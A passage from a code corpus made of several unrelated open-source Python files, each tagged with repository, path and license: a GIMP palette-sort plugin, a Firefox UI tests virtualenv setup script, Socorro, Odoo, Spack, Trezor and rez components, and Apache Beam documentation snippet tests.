raise ValueError("Couldn't find background color %r in palette" % list(bg))
if find_index(fg, start + 1):
raise ValueError('Autoslice cannot be used when more than one'
' instance of an endpoint'
' (%s) is present' % hexcolor(fg))
if find_index(bg, end + 1):
raise ValueError('Autoslice cannot be used when more than one'
' instance of an endpoint'
' (%s) is present' % hexcolor(bg))
if start > end:
end, start = start, end
length = (end - start) + 1
try:
_, nrows, _ = parse_slice(slice_expr, length)
nrows = abs(nrows)
if length % nrows:
raise ValueError('Total length %d not evenly divisible'
' by number of rows %d' % (length, nrows))
length /= nrows
except ValueError:
# bad expression is okay here, just assume one row
nrows = 1
# remaining behaviour is implemented by SELECT_SLICE 'inheritance'.
selection= SELECT_SLICE
elif selection in (SELECT_SLICE, SELECT_PARTITIONED):
start, nrows, length = parse_slice(slice_expr, num_colors)
channels_getter_1, channel_index = channel_getters[channel1]
channels_getter_2, channel2_index = channel_getters[channel2]
def get_colors(start, end):
result = []
for i in range(start, end):
entry = (pdb.gimp_palette_entry_get_name (palette, i),
pdb.gimp_palette_entry_get_color (palette, i))
index1 = channels_getter_1(entry[1], i)[channel_index]
index2 = channels_getter_2(entry[1], i)[channel2_index]
index = ((index1 - (index1 % grain1)) * (1 if ascending1 else -1),
(index2 - (index2 % grain2)) * (1 if ascending2 else -1)
)
result.append((index, entry))
return result
if selection == SELECT_ALL:
entry_list = get_colors(0, num_colors)
entry_list.sort(key=lambda v:v[0])
for i in range(num_colors):
pdb.gimp_palette_entry_set_name (palette, i, entry_list[i][1][0])
pdb.gimp_palette_entry_set_color (palette, i, entry_list[i][1][1])
elif selection == SELECT_PARTITIONED:
if num_colors < (start + length * nrows) - 1:
raise ValueError('Not enough entries in palette to '
'sort complete rows! Got %d, expected >=%d' %
(num_colors, start + length * nrows))
pchannels_getter, pchannel_index = channel_getters[pchannel]
for row in range(nrows):
partition_spans = [1]
rowstart = start + (row * length)
old_color = pdb.gimp_palette_entry_get_color (palette,
rowstart)
old_partition = pchannels_getter(old_color, rowstart)[pchannel_index]
old_partition = old_partition - (old_partition % pgrain)
for i in range(rowstart + 1, rowstart + length):
this_color = pdb.gimp_palette_entry_get_color (palette, i)
this_partition = pchannels_getter(this_color, i)[pchannel_index]
this_partition = this_partition - (this_partition % pgrain)
if this_partition == old_partition:
partition_spans[-1] += 1
else:
partition_spans.append(1)
old_partition = this_partition
base = rowstart
for size in partition_spans:
palette_sort(palette, SELECT_SLICE, '%d:1,%d' % (base, size),
channel, quantize, ascending, 0, 1.0)
base += size
else:
stride = length
if num_colors < (start + stride * nrows) - 1:
raise ValueError('Not enough entries in palette to sort '
'complete rows! Got %d, expected >=%d' %
(num_colors, start + stride * nrows))
for row_start in range(start, start + stride * nrows, stride):
sublist = get_colors(row_start, row_start + stride)
sublist.sort(key=lambda v:v[0], reverse=not ascending)
for i, entry in zip(range(row_start, row_start + stride), sublist):
pdb.gimp_palette_entry_set_name (palette, i, entry[1][0])
pdb.gimp_palette_entry_set_color (palette, i, entry[1][1])
return palette
register(
"python-fu-palette-sort",
N_("Sort the colors in a palette"),
# FIXME: Write humanly readable help -
# (I can't figure out what the plugin does, or how to use the parameters after
# David's enhacements even looking at the code -
# let alone someone just using GIMP (JS) )
dedent("""\
palette_sort (palette, selection, slice_expr, channel,
channel2, quantize, ascending, pchannel, pquantize) -> new_palette
Sorts a palette, or part of a palette, using several options.
One can select two color channels over which to sort,
and several auxiliary parameters create a 2D sorted
palette with sorted rows, among other things.
One can optionally install colormath
(https://pypi.python.org/pypi/colormath/1.0.8)
to GIMP's Python to get even more channels to choose from.
"""),
"João S. O. Bueno, Carol Spears, David Gowers",
"João S. O. Bueno, Carol Spears, David Gowers",
"2006-2014",
N_("_Sort Palette..."),
"",
[
(PF_PALETTE, "palette", _("Palette"), ""),
(PF_OPTION, "selections", _("Se_lections"), SELECT_ALL,
(_("All"), _("Slice / Array"), _("Autoslice (fg->bg)"),
_("Partitioned"))),
(PF_STRING, "slice-expr", _("Slice _expression"), ''),
(PF_OPTION, "channel1", _("Channel to _sort"), 3,
AVAILABLE_CHANNELS),
(PF_BOOL, "ascending1", _("_Ascending"), True),
(PF_OPTION, "channel2", _("Secondary Channel to s_ort"), 5,
AVAILABLE_CHANNELS),
(PF_BOOL, "ascending2", _("_Ascending"), True),
(PF_FLOAT, "quantize", _("_Quantization"), 0.0),
(PF_OPTION, "pchannel", _("_Partitioning channel"), 3,
AVAILABLE_CHANNELS),
(PF_FLOAT, "pquantize", _("Partition q_uantization"), 0.0),
],
[],
palette_sort,
menu="<Palettes>",
domain=("gimp20-python", gimp.locale_directory)
)
main ()
|
brion/gimp
|
plug-ins/pygimp/plug-ins/palette-sort.py
|
Python
|
gpl-3.0
| 13,495
|
#!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
The script can be used to setup a virtual environment for running Firefox UI Tests.
It will automatically install the firefox ui test package, all its dependencies,
and optional packages if specified.
"""
import argparse
import os
import shutil
import subprocess
import sys
import urllib2
import zipfile
# Link to the folder, which contains the zip archives of virtualenv
VIRTUALENV_URL = 'https://github.com/pypa/virtualenv/archive/%(VERSION)s.zip'
VIRTUALENV_VERSION = '12.1.1'
here = os.path.dirname(os.path.abspath(__file__))
venv_script_path = 'Scripts' if sys.platform == 'win32' else 'bin'
venv_activate = os.path.join(venv_script_path, 'activate')
venv_activate_this = os.path.join(venv_script_path, 'activate_this.py')
venv_python_bin = os.path.join(venv_script_path, 'python')
usage_message = """
***********************************************************************
To run the Firefox UI Tests, activate the virtual environment:
{}{}
See firefox-ui-tests --help for all options
***********************************************************************
"""
def download(url, target):
"""Downloads the specified url to the given target."""
response = urllib2.urlopen(url)
with open(target, 'wb') as f:
f.write(response.read())
return target
def create_virtualenv(target, python_bin=None):
script_path = os.path.join(here, 'virtualenv-%s' % VIRTUALENV_VERSION,
'virtualenv.py')
print 'Downloading virtualenv %s' % VIRTUALENV_VERSION
zip_path = download(VIRTUALENV_URL % {'VERSION': VIRTUALENV_VERSION},
os.path.join(here, 'virtualenv.zip'))
try:
with zipfile.ZipFile(zip_path, 'r') as f:
f.extractall(here)
print 'Creating new virtual environment'
cmd_args = [sys.executable, script_path, target]
if python_bin:
cmd_args.extend(['-p', python_bin])
subprocess.check_call(cmd_args)
finally:
try:
os.remove(zip_path)
except OSError:
pass
shutil.rmtree(os.path.dirname(script_path), ignore_errors=True)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--python',
dest='python',
metavar='BINARY',
help='The Python interpreter to use.')
parser.add_argument('venv',
metavar='PATH',
help='Path to the environment to be created.')
args = parser.parse_args()
# Remove an already existent virtual environment
if os.path.exists(args.venv):
print 'Removing already existent virtual environment at: %s' % args.venv
shutil.rmtree(args.venv, True)
create_virtualenv(args.venv, python_bin=args.python)
# Activate the environment
venv = os.path.join(args.venv, venv_activate_this)
execfile(venv, dict(__file__=venv))
# Install Firefox UI tests, dependencies and optional packages
command = ['pip', 'install',
'-r', 'requirements.txt',
'-r', 'requirements_optional.txt',
]
print 'Installing Firefox UI Tests and dependencies...'
print 'Command: %s' % command
subprocess.check_call(command, cwd=os.path.dirname(here))
# Print the user instructions
print usage_message.format('' if sys.platform == 'win32' else 'source ',
os.path.join(args.venv, venv_activate))
if __name__ == "__main__":
main()
|
Motwani/firefox-ui-tests
|
.travis/create_venv.py
|
Python
|
mpl-2.0
| 3,764
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import mock
from nose.tools import ok_
from crontabber.app import CronTabber
from socorro.unittest.cron.jobs.base import IntegrationTestBase
from socorro.unittest.cron.setup_configman import (
get_config_manager_for_crontabber,
)
from socorro.schemas import CRASH_REPORT_JSON_SCHEMA_AS_STRING
class TestUploadCrashReportJSONSchemaCronApp(IntegrationTestBase):
def _setup_config_manager(self):
return get_config_manager_for_crontabber(
jobs='socorro.cron.jobs.upload_crash_report_json_schema.'
'UploadCrashReportJSONSchemaCronApp|30d',
)
@mock.patch('boto.connect_s3')
def test_run(self, connect_s3):
key = mock.MagicMock()
connect_s3().get_bucket().get_key.return_value = None
connect_s3().get_bucket().new_key.return_value = key
with self._setup_config_manager().context() as config:
tab = CronTabber(config)
tab.run_all()
information = self._load_structure()
app_name = 'upload-crash-report-json-schema'
ok_(information[app_name])
ok_(not information[app_name]['last_error'])
ok_(information[app_name]['last_success'])
key.set_contents_from_string.assert_called_with(
CRASH_REPORT_JSON_SCHEMA_AS_STRING
)
|
m8ttyB/socorro
|
socorro/unittest/cron/jobs/test_upload_crash_report_json_schema.py
|
Python
|
mpl-2.0
| 1,523
|
# -*- coding: utf-8 -*-
# © 2015 Grupo ESOC Ingeniería de Servicios, S.L.U. - Jairo Llopis
# License LGPL-3.0 or later (https://www.gnu.org/licenses/lgpl.html).
from openerp import api, models
class WebsiteMenu(models.Model):
_inherit = "website.menu"
@api.multi
def get_parents(self, revert=False, include_self=False):
"""List current menu's parents.
:param bool revert:
Indicates if the result must be revert before returning.
Activating this will mean that the result will be ordered from
parent to child.
:param bool include_self:
Indicates if the current menu item must be included in the result.
:return list:
Menu items ordered from child to parent, unless ``revert=True``.
"""
result = list()
menu = self if include_self else self.parent_id
while menu:
result.append(menu)
menu = menu.parent_id
return reversed(result) if revert else result
|
Tecnativa/website
|
website_breadcrumb/models/website.py
|
Python
|
agpl-3.0
| 1,026
|
"""
mock_django.signals
~~~~~~~~~~~~~~~~
:copyright: (c) 2012 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import contextlib
import mock
@contextlib.contextmanager
def mock_signal_receiver(signal, wraps=None, **kwargs):
"""
Temporarily attaches a receiver to the provided ``signal`` within the scope
of the context manager.
The mocked receiver is returned as the ``as`` target of the ``with``
statement.
To have the mocked receiver wrap a callable, pass the callable as the
``wraps`` keyword argument. All other keyword arguments provided are passed
through to the signal's ``connect`` method.
>>> with mock_signal_receiver(post_save, sender=Model) as receiver:
>>> Model.objects.create()
>>> assert receiver.call_count = 1
"""
if wraps is None:
def wraps(*args, **kwrags):
return None
receiver = mock.Mock(wraps=wraps)
signal.connect(receiver, **kwargs)
yield receiver
signal.disconnect(receiver)
|
devs1991/test_edx_docmode
|
venv/lib/python2.7/site-packages/mock_django/signals.py
|
Python
|
agpl-3.0
| 1,028
|
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
warn_deprecated_import('grades.rest_api.v1.tests.test_grading_policy_view', 'lms.djangoapps.grades.rest_api.v1.tests.test_grading_policy_view')
from lms.djangoapps.grades.rest_api.v1.tests.test_grading_policy_view import *
|
eduNEXT/edunext-platform
|
import_shims/lms/grades/rest_api/v1/tests/test_grading_policy_view.py
|
Python
|
agpl-3.0
| 470
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RAffyqcreport(RPackage):
"""This package creates a QC report for an AffyBatch object.
The report is intended to allow the user to quickly assess the
quality of a set of arrays in an AffyBatch object."""
homepage = "https://www.bioconductor.org/packages/affyQCReport/"
url = "https://git.bioconductor.org/packages/affyQCReport"
version('1.54.0', git='https://git.bioconductor.org/packages/affyQCReport', commit='5572e9981dc874b78b4adebf58080cac3fbb69e1')
depends_on('r@3.4.0:3.4.9', when='@1.54.0')
depends_on('r-biobase', type=('build', 'run'))
depends_on('r-affy', type=('build', 'run'))
depends_on('r-lattice', type=('build', 'run'))
depends_on('r-affyplm', type=('build', 'run'))
depends_on('r-genefilter', type=('build', 'run'))
depends_on('r-rcolorbrewer', type=('build', 'run'))
depends_on('r-simpleaffy', type=('build', 'run'))
depends_on('r-xtable', type=('build', 'run'))
|
EmreAtes/spack
|
var/spack/repos/builtin/packages/r-affyqcreport/package.py
|
Python
|
lgpl-2.1
| 2,212
|
# This file is part of the Trezor project.
#
# Copyright (C) 2012-2018 SatoshiLabs and contributors
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License version 3
# as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the License along with this library.
# If not, see <https://www.gnu.org/licenses/lgpl-3.0.html>.
import pytest
import trezorlib.messages as m
from .conftest import setup_client
@setup_client()
@pytest.mark.parametrize(
"message",
[
m.Ping(message="hello", button_protection=True),
m.GetAddress(
address_n=[0],
coin_name="Bitcoin",
script_type=m.InputScriptType.SPENDADDRESS,
show_display=True,
),
],
)
def test_cancel_message_via_cancel(client, message):
resp = client.call_raw(message)
assert isinstance(resp, m.ButtonRequest)
client.transport.write(m.ButtonAck())
client.transport.write(m.Cancel())
resp = client.transport.read()
assert isinstance(resp, m.Failure)
assert resp.code == m.FailureType.ActionCancelled
@setup_client()
@pytest.mark.parametrize(
"message",
[
m.Ping(message="hello", button_protection=True),
m.GetAddress(
address_n=[0],
coin_name="Bitcoin",
script_type=m.InputScriptType.SPENDADDRESS,
show_display=True,
),
],
)
def test_cancel_message_via_initialize(client, message):
resp = client.call_raw(message)
assert isinstance(resp, m.ButtonRequest)
client.transport.write(m.ButtonAck())
client.transport.write(m.Initialize())
resp = client.transport.read()
assert isinstance(resp, m.Features)
|
romanz/python-trezor
|
trezorlib/tests/device_tests/test_cancel.py
|
Python
|
lgpl-3.0
| 2,032
|
from rezgui.qt import QtGui
from rezgui.util import create_pane
from rezgui.mixins.ContextViewMixin import ContextViewMixin
from rezgui.models.ContextModel import ContextModel
from rez.config import config
from rez.vendor import yaml
from rez.vendor.yaml.error import YAMLError
from rez.vendor.schema.schema import Schema, SchemaError, Or, And, Use
from functools import partial
class ContextSettingsWidget(QtGui.QWidget, ContextViewMixin):
titles = {
"packages_path": "Search path for Rez packages",
"implicit_packages": "Packages that are implicitly added to the request",
"package_filter": "Package exclusion/inclusion rules"
}
schema_dict = {
"packages_path": [basestring],
"implicit_packages": [basestring],
"package_filter": Or(And(None, Use(lambda x: [])),
And(dict, Use(lambda x: [x])),
[dict])
}
def __init__(self, context_model=None, attributes=None, parent=None):
"""
Args:
attributes (list of str): Select only certain settings to expose. If
None, all settings are exposed.
"""
super(ContextSettingsWidget, self).__init__(parent)
ContextViewMixin.__init__(self, context_model)
self.schema_keys = set(self.schema_dict.iterkeys())
if attributes:
self.schema_keys &= set(attributes)
assert self.schema_keys
schema_dict = dict((k, v) for k, v in self.schema_dict.iteritems()
if k in self.schema_keys)
self.schema = Schema(schema_dict)
self.edit = QtGui.QTextEdit()
self.edit.setStyleSheet("font: 12pt 'Courier'")
self.default_btn = QtGui.QPushButton("Set To Defaults")
self.discard_btn = QtGui.QPushButton("Discard Changes...")
self.apply_btn = QtGui.QPushButton("Apply")
self.discard_btn.setEnabled(False)
self.apply_btn.setEnabled(False)
btn_pane = create_pane([None, self.default_btn, self.discard_btn,
self.apply_btn], True)
layout = QtGui.QVBoxLayout()
layout.addWidget(self.edit)
layout.addWidget(btn_pane)
self.setLayout(layout)
self.apply_btn.clicked.connect(self.apply_changes)
self.default_btn.clicked.connect(self.set_defaults)
self.discard_btn.clicked.connect(partial(self.discard_changes, True))
self.edit.textChanged.connect(self._settingsChanged)
self._update_text()
def _contextChanged(self, flags=0):
if not (flags & ContextModel.CONTEXT_CHANGED):
return
self._update_text()
def apply_changes(self):
def _content_error(title, text):
ret = QtGui.QMessageBox.warning(self, title, text,
QtGui.QMessageBox.Discard,
QtGui.QMessageBox.Cancel)
if ret == QtGui.QMessageBox.Discard:
self.discard_changes()
# load new content
try:
txt = self.edit.toPlainText()
data = yaml.load(str(txt))
except YAMLError as e:
_content_error("Invalid syntax", str(e))
return
# check against schema
if self.schema:
try:
data = self.schema.validate(data)
except SchemaError as e:
_content_error("Settings validation failure", str(e))
return
# apply to context model
self.context_model.set_packages_path(data["packages_path"])
self.context_model.set_package_filter(data["package_filter"])
self._update_text()
def discard_changes(self, prompt=False):
if prompt:
ret = QtGui.QMessageBox.warning(
self,
"The context settings have been modified.",
"Your changes will be lost. Are you sure?",
QtGui.QMessageBox.Ok,
QtGui.QMessageBox.Cancel)
if ret != QtGui.QMessageBox.Ok:
return
self._update_text()
def set_defaults(self):
packages_path = config.packages_path
implicits = [str(x) for x in config.implicit_packages]
package_filter = config.package_filter
data = {"packages_path": packages_path,
"implicit_packages": implicits,
"package_filter": package_filter}
data = dict((k, v) for k, v in data.iteritems()
if k in self.schema_keys)
self._set_text(data)
self.discard_btn.setEnabled(True)
self.apply_btn.setEnabled(True)
def _update_text(self):
model = self.context_model
implicits = [str(x) for x in model.implicit_packages]
data = {"packages_path": model.packages_path,
"implicit_packages": implicits,
"package_filter": model.package_filter}
data = dict((k, v) for k, v in data.iteritems()
if k in self.schema_keys)
self._set_text(data)
self.discard_btn.setEnabled(False)
self.apply_btn.setEnabled(False)
def _set_text(self, data):
lines = []
for key, value in data.iteritems():
lines.append('')
txt = yaml.dump({key: value}, default_flow_style=False)
title = self.titles.get(key)
if title:
lines.append("# %s" % title)
lines.append(txt.rstrip())
txt = '\n'.join(lines) + '\n'
txt = txt.lstrip()
self.edit.setPlainText(txt)
def _settingsChanged(self):
self.discard_btn.setEnabled(True)
self.apply_btn.setEnabled(True)
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
|
LumaPictures/rez
|
src/rezgui/widgets/ContextSettingsWidget.py
|
Python
|
lgpl-3.0
| 6,497
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for all code snippets used in public docs."""
import glob
import gzip
import logging
import os
import tempfile
import unittest
import uuid
import apache_beam as beam
from apache_beam import coders
from apache_beam import pvalue
from apache_beam import typehints
from apache_beam.transforms.util import assert_that
from apache_beam.transforms.util import equal_to
from apache_beam.utils.pipeline_options import TypeOptions
from apache_beam.examples.snippets import snippets
# pylint: disable=expression-not-assigned
from apache_beam.test_pipeline import TestPipeline
# Protect against environments where apitools library is not available.
# pylint: disable=wrong-import-order, wrong-import-position
try:
from apitools.base.py import base_api
except ImportError:
base_api = None
# pylint: enable=wrong-import-order, wrong-import-position
# Protect against environments where datastore library is not available.
# pylint: disable=wrong-import-order, wrong-import-position
try:
from google.cloud.proto.datastore.v1 import datastore_pb2
except ImportError:
datastore_pb2 = None
# pylint: enable=wrong-import-order, wrong-import-position
class ParDoTest(unittest.TestCase):
"""Tests for model/par-do."""
def test_pardo(self):
# Note: "words" and "ComputeWordLengthFn" are referenced by name in
# the text of the doc.
words = ['aa', 'bbb', 'c']
# [START model_pardo_pardo]
class ComputeWordLengthFn(beam.DoFn):
def process(self, element):
return [len(element)]
# [END model_pardo_pardo]
# [START model_pardo_apply]
# Apply a ParDo to the PCollection "words" to compute lengths for each word.
word_lengths = words | beam.ParDo(ComputeWordLengthFn())
# [END model_pardo_apply]
self.assertEqual({2, 3, 1}, set(word_lengths))
def test_pardo_yield(self):
words = ['aa', 'bbb', 'c']
# [START model_pardo_yield]
class ComputeWordLengthFn(beam.DoFn):
def process(self, element):
yield len(element)
# [END model_pardo_yield]
word_lengths = words | beam.ParDo(ComputeWordLengthFn())
self.assertEqual({2, 3, 1}, set(word_lengths))
def test_pardo_using_map(self):
words = ['aa', 'bbb', 'c']
# [START model_pardo_using_map]
word_lengths = words | beam.Map(len)
# [END model_pardo_using_map]
self.assertEqual({2, 3, 1}, set(word_lengths))
def test_pardo_using_flatmap(self):
words = ['aa', 'bbb', 'c']
# [START model_pardo_using_flatmap]
word_lengths = words | beam.FlatMap(lambda word: [len(word)])
# [END model_pardo_using_flatmap]
self.assertEqual({2, 3, 1}, set(word_lengths))
def test_pardo_using_flatmap_yield(self):
words = ['aA', 'bbb', 'C']
# [START model_pardo_using_flatmap_yield]
def capitals(word):
for letter in word:
if 'A' <= letter <= 'Z':
yield letter
all_capitals = words | beam.FlatMap(capitals)
# [END model_pardo_using_flatmap_yield]
self.assertEqual({'A', 'C'}, set(all_capitals))
def test_pardo_with_label(self):
# pylint: disable=line-too-long
words = ['aa', 'bbc', 'defg']
# [START model_pardo_with_label]
result = words | 'CountUniqueLetters' >> beam.Map(
lambda word: len(set(word)))
# [END model_pardo_with_label]
self.assertEqual({1, 2, 4}, set(result))
def test_pardo_side_input(self):
p = TestPipeline()
words = p | 'start' >> beam.Create(['a', 'bb', 'ccc', 'dddd'])
# [START model_pardo_side_input]
# Callable takes additional arguments.
def filter_using_length(word, lower_bound, upper_bound=float('inf')):
if lower_bound <= len(word) <= upper_bound:
yield word
# Construct a deferred side input.
avg_word_len = (words
| beam.Map(len)
| beam.CombineGlobally(beam.combiners.MeanCombineFn()))
# Call with explicit side inputs.
small_words = words | 'small' >> beam.FlatMap(filter_using_length, 0, 3)
# A single deferred side input.
larger_than_average = (words | 'large' >> beam.FlatMap(
filter_using_length,
lower_bound=pvalue.AsSingleton(avg_word_len)))
# Mix and match.
small_but_nontrivial = words | beam.FlatMap(filter_using_length,
lower_bound=2,
upper_bound=pvalue.AsSingleton(
avg_word_len))
# [END model_pardo_side_input]
beam.assert_that(small_words, beam.equal_to(['a', 'bb', 'ccc']))
beam.assert_that(larger_than_average, beam.equal_to(['ccc', 'dddd']),
label='larger_than_average')
beam.assert_that(small_but_nontrivial, beam.equal_to(['bb']),
label='small_but_not_trivial')
p.run()
def test_pardo_side_input_dofn(self):
words = ['a', 'bb', 'ccc', 'dddd']
# [START model_pardo_side_input_dofn]
class FilterUsingLength(beam.DoFn):
def process(self, element, lower_bound, upper_bound=float('inf')):
if lower_bound <= len(element) <= upper_bound:
yield element
small_words = words | beam.ParDo(FilterUsingLength(), 0, 3)
# [END model_pardo_side_input_dofn]
self.assertEqual({'a', 'bb', 'ccc'}, set(small_words))
def test_pardo_with_side_outputs(self):
# [START model_pardo_emitting_values_on_side_outputs]
class ProcessWords(beam.DoFn):
def process(self, element, cutoff_length, marker):
if len(element) <= cutoff_length:
# Emit this short word to the main output.
yield element
else:
# Emit this word's long length to a side output.
yield pvalue.SideOutputValue(
'above_cutoff_lengths', len(element))
if element.startswith(marker):
# Emit this word to a different side output.
yield pvalue.SideOutputValue('marked strings', element)
# [END model_pardo_emitting_values_on_side_outputs]
words = ['a', 'an', 'the', 'music', 'xyz']
# [START model_pardo_with_side_outputs]
results = (words | beam.ParDo(ProcessWords(), cutoff_length=2, marker='x')
.with_outputs('above_cutoff_lengths', 'marked strings',
main='below_cutoff_strings'))
below = results.below_cutoff_strings
above = results.above_cutoff_lengths
marked = results['marked strings'] # indexing works as well
# [END model_pardo_with_side_outputs]
self.assertEqual({'a', 'an'}, set(below))
self.assertEqual({3, 5}, set(above))
self.assertEqual({'xyz'}, set(marked))
# [START model_pardo_with_side_outputs_iter]
below, above, marked = (words
| beam.ParDo(
ProcessWords(), cutoff_length=2, marker='x')
.with_outputs('above_cutoff_lengths',
'marked strings',
main='below_cutoff_strings'))
# [END model_pardo_with_side_outputs_iter]
self.assertEqual({'a', 'an'}, set(below))
self.assertEqual({3, 5}, set(above))
self.assertEqual({'xyz'}, set(marked))
def test_pardo_with_undeclared_side_outputs(self):
numbers = [1, 2, 3, 4, 5, 10, 20]
# [START model_pardo_with_side_outputs_undeclared]
def even_odd(x):
yield pvalue.SideOutputValue('odd' if x % 2 else 'even', x)
if x % 10 == 0:
yield x
results = numbers | beam.FlatMap(even_odd).with_outputs()
evens = results.even
odds = results.odd
tens = results[None] # the undeclared main output
# [END model_pardo_with_side_outputs_undeclared]
self.assertEqual({2, 4, 10, 20}, set(evens))
self.assertEqual({1, 3, 5}, set(odds))
self.assertEqual({10, 20}, set(tens))
class TypeHintsTest(unittest.TestCase):
def test_bad_types(self):
p = TestPipeline()
evens = None # pylint: disable=unused-variable
# [START type_hints_missing_define_numbers]
numbers = p | beam.Create(['1', '2', '3'])
# [END type_hints_missing_define_numbers]
# Consider the following code.
# pylint: disable=expression-not-assigned
# pylint: disable=unused-variable
# [START type_hints_missing_apply]
evens = numbers | beam.Filter(lambda x: x % 2 == 0)
# [END type_hints_missing_apply]
# Now suppose numbers was defined as [snippet above].
# When running this pipeline, you'd get a runtime error,
# possibly on a remote machine, possibly very late.
with self.assertRaises(TypeError):
p.run()
# To catch this early, we can assert what types we expect.
with self.assertRaises(typehints.TypeCheckError):
# [START type_hints_takes]
p.options.view_as(TypeOptions).pipeline_type_check = True
evens = numbers | beam.Filter(lambda x: x % 2 == 0).with_input_types(int)
# [END type_hints_takes]
# Type hints can be declared on DoFns and callables as well, rather
# than where they're used, to be more self contained.
with self.assertRaises(typehints.TypeCheckError):
# [START type_hints_do_fn]
@beam.typehints.with_input_types(int)
class FilterEvensDoFn(beam.DoFn):
def process(self, element):
if element % 2 == 0:
yield element
evens = numbers | beam.ParDo(FilterEvensDoFn())
# [END type_hints_do_fn]
words = p | 'words' >> beam.Create(['a', 'bb', 'c'])
# One can assert outputs and apply them to transforms as well.
# Helps document the contract and checks it at pipeline construction time.
# [START type_hints_transform]
T = beam.typehints.TypeVariable('T')
@beam.typehints.with_input_types(T)
@beam.typehints.with_output_types(beam.typehints.Tuple[int, T])
class MyTransform(beam.PTransform):
def expand(self, pcoll):
return pcoll | beam.Map(lambda x: (len(x), x))
words_with_lens = words | MyTransform()
# [END type_hints_transform]
# pylint: disable=expression-not-assigned
with self.assertRaises(typehints.TypeCheckError):
words_with_lens | beam.Map(lambda x: x).with_input_types(
beam.typehints.Tuple[int, int])
def test_runtime_checks_off(self):
# pylint: disable=expression-not-assigned
p = TestPipeline()
# [START type_hints_runtime_off]
p | beam.Create(['a']) | beam.Map(lambda x: 3).with_output_types(str)
p.run()
# [END type_hints_runtime_off]
def test_runtime_checks_on(self):
# pylint: disable=expression-not-assigned
p = TestPipeline()
with self.assertRaises(typehints.TypeCheckError):
# [START type_hints_runtime_on]
p.options.view_as(TypeOptions).runtime_type_check = True
p | beam.Create(['a']) | beam.Map(lambda x: 3).with_output_types(str)
p.run()
# [END type_hints_runtime_on]
def test_deterministic_key(self):
p = TestPipeline()
lines = (p | beam.Create(
['banana,fruit,3', 'kiwi,fruit,2', 'kiwi,fruit,2', 'zucchini,veg,3']))
# [START type_hints_deterministic_key]
class Player(object):
def __init__(self, team, name):
self.team = team
self.name = name
class PlayerCoder(beam.coders.Coder):
def encode(self, player):
return '%s:%s' % (player.team, player.name)
def decode(self, s):
return Player(*s.split(':'))
def is_deterministic(self):
return True
beam.coders.registry.register_coder(Player, PlayerCoder)
def parse_player_and_score(csv):
name, team, score = csv.split(',')
return Player(team, name), int(score)
totals = (
lines
| beam.Map(parse_player_and_score)
| beam.CombinePerKey(sum).with_input_types(
beam.typehints.Tuple[Player, int]))
# [END type_hints_deterministic_key]
assert_that(
totals | beam.Map(lambda (k, v): (k.name, v)),
equal_to([('banana', 3), ('kiwi', 4), ('zucchini', 3)]))
p.run()
class SnippetsTest(unittest.TestCase):
# Replacing text read/write transforms with dummy transforms for testing.
class DummyReadTransform(beam.PTransform):
"""A transform that will replace iobase.ReadFromText.
To be used for testing.
"""
def __init__(self, file_to_read=None, compression_type=None):
self.file_to_read = file_to_read
self.compression_type = compression_type
class ReadDoFn(beam.DoFn):
def __init__(self, file_to_read, compression_type):
self.file_to_read = file_to_read
self.compression_type = compression_type
self.coder = coders.StrUtf8Coder()
def process(self, element):
pass
def finish_bundle(self):
assert self.file_to_read
for file_name in glob.glob(self.file_to_read):
if self.compression_type is None:
with open(file_name) as file:
for record in file:
yield self.coder.decode(record.rstrip('\n'))
else:
with gzip.open(file_name, 'r') as file:
for record in file:
yield self.coder.decode(record.rstrip('\n'))
def expand(self, pcoll):
return pcoll | beam.Create([None]) | 'DummyReadForTesting' >> beam.ParDo(
SnippetsTest.DummyReadTransform.ReadDoFn(
self.file_to_read, self.compression_type))
